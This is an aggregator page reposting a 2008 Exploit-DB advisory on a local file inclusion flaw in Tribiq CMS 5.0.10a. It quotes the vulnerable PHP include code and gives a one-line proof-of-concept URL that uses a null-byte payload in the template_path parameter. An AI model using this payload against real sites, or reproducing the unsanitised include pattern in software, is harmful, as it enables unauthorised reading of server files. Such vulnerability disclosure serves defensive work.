Lucene search
+L

Tribiq CMS 5.0.10a (Windows) - Local File Inclusion

🗓️ 31 Oct 2008 00:00:00Reported by GoLd_MType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Tribiq CMS 5.0.10a (Windows) - Local File Inclusion vulnerability in header.inc.ph

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-2220
26 Jun 200915:30
attackerkb
circl
Circl
CVE-2008-4893
31 Oct 200800:00
circl
circl
Circl
CVE-2008-4894
31 Oct 200800:00
circl
cve
CVE
CVE-2008-4893
4 Nov 200800:00
cve
cve
CVE
CVE-2008-4894
4 Nov 200800:00
cve
cvelist
Cvelist
CVE-2008-4893
4 Nov 200800:00
cvelist
cvelist
Cvelist
CVE-2008-4894
4 Nov 200800:00
cvelist
euvd
EUVD
EUVD-2008-4872
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-4873
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-4893
4 Nov 200800:58
nvd
Rows per page
 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|


Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability

Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php

<div id="header">
  <div id="logo"> <img src="templates/<?php echo $template_path;?>/images/logo.gif" alt="Company Name" /> </div>
  <div id="language_selector">
    <?php include "templates/".$template_path."/includes/language_box.inc.php";?> <--x
  </div>
  <div id="search_box">
    <div id="searchbox_holder">
      <?php include "templates/".$template_path."/includes/searchbox.inc.php";?><--x
    </div>
  </div>
</div>

POC :
/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00

        ____           _           _           __  __
       / ___|   ___   | |       __| |         |  \/  |
      | |  _   / _ \  | |      / _` |         | |\/| |
      | |_| | | (_) | | |___  | (_| |         | |  | |
       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
                                      |_____|

# milw0rm.com [2008-10-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.1
EPSS0.01996
33